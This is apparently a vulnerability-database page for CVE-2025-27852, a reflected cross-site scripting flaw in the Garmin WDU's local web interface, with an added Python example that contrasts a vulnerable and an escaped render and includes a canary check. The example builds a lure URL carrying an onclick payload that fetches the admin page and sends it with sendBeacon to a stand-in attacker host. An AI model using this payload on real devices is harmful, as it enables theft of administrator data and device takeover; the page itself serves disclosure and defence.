
CVE-2025-27852

5.0 MEDIUM

The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a reflected cross site scripting (XSS) attack

Published: 2026-05-13 · Last updated: 2026-06-02

Severity and scoring

CVSS
5.0 MEDIUM
Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE
CWE-79

Affected products

Vendor: garmin
Product: empirbus_wireless_display_unit_firmware

Description

The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a reflected cross site scripting (XSS) attack. This allows an attacker on the local network segment to execute arbitrary JavaScript code within the context of the WDU webpage. Full administrator level access to the device is possible. To initiate an exploit of this vulnerability, the victim must execute two actions: (1) view a specific URL served by the WDU, and (2) click an element on the rendered page.

Source: NVD
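The bug class in the description, as an added example for this page (not Garmin's code and not part of the NVD record): a hypothetical device status page that echoes a `name` query parameter into its HTML, the same page with the parameter HTML-entity-encoded, a constructed payload that injects markup but stays inert until clicked (matching the two-step interaction the description requires, view the crafted URL then click an element), and a canary check of the kind a scanner uses to confirm unescaped reflection. The host name, path, parameter name, `/admin` endpoint and `attacker.local` collector are all placeholders, not anything observed on the WDU.

```python
"""Reflected XSS on a locally served device page: vulnerable vs hardened render.

Added example for this page. Not Garmin's code; the host, page path, "name"
parameter, /admin endpoint and the payload are constructed assumptions.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit

BASE_URL = "http://wdu.local/status"  # hypothetical device page


def _name_param(url: str) -> str:
    """Extract the percent-decoded 'name' query parameter ('' if absent)."""
    return parse_qs(urlsplit(url).query).get("name", [""])[0]


def render_vulnerable(url: str) -> str:
    """Echoes the parameter straight into element content: the CWE-79 pattern."""
    return f"<h1>Display: {_name_param(url)}</h1><a href='/admin'>Admin</a>"


def render_fixed(url: str) -> str:
    """Same page, with the parameter HTML-entity-encoded for element content.
    Attribute, URL or JavaScript contexts would each need their own encoder."""
    return (f"<h1>Display: {html.escape(_name_param(url), quote=True)}</h1>"
            "<a href='/admin'>Admin</a>")


# Constructed attacker payload. It injects an anchor but runs no script until
# the victim clicks it, which is why the advisory needs a second user action
# (CVSS UI:R). The fetch/sendBeacon targets are placeholders.
PAYLOAD = ('<a href="#" onclick="fetch(\'/admin\').then(r=>r.text())'
           '.then(t=>navigator.sendBeacon(\'http://attacker.local/x\',t))">'
           'Firmware update available, click to install</a>')


def attacker_url(base_url: str = BASE_URL) -> str:
    """Build the crafted link the victim would be lured into opening."""
    return f"{base_url}?name={quote(PAYLOAD)}"


CANARY = 'xss1<"\'>'  # metacharacters a reflection check looks for verbatim


def reflects_unescaped(render, base_url: str = BASE_URL) -> bool:
    """Scanner-style check: does the page echo HTML metacharacters back raw?"""
    body = render(f"{base_url}?name={quote(CANARY)}")
    return CANARY in body


if __name__ == "__main__":
    url = attacker_url()
    print("vulnerable page reflects payload:", PAYLOAD in render_vulnerable(url))
    print("fixed page reflects payload:     ", PAYLOAD in render_fixed(url))
    print("canary check vulnerable / fixed: ",
          reflects_unescaped(render_vulnerable), reflects_unescaped(render_fixed))
```

The canary check is the quickest way to triage a page like this from the local segment: if the metacharacters come back unchanged, the page is injectable regardless of whether a working payload has been found. Note that `html.escape` is only correct for element content; a parameter reflected inside an attribute value, a URL or an inline script needs the encoder for that context, and on an embedded device whose admin functions live on the same origin, a Content-Security-Policy does not remove the need to encode output.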

Related CVEs

Same vendor

  • CVE-2025-27853 The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows its authentication to be bypassed (7.3 HIGH)
  • CVE-2025-27851 The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a cross-site origin WebSocket hijacking attack (9.3 CRITICAL)
  • CVE-2025-27850 The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a symlink attack (7.5 HIGH)

Same CWE

  • CVE-2026-9125 The Presto Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link_url' parameter of the [presto_player_ov... (6.4 MEDIUM)
  • CVE-2026-42653 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in iova.Mihai SliceWP allows Stored XSS (7.1 HIGH)
  • CVE-2026-46489 SolidInvoice is an open-source invoicing platform (8.1 HIGH)
  • CVE-2026-8589 GitLab has remediated an issue in GitLab EE affecting all versions from 13.1.4 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0... (7.3 HIGH)
  • CVE-2026-10087 GitLab has remediated an issue in GitLab EE affecting all versions from 17.1 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2... (8.7 HIGH)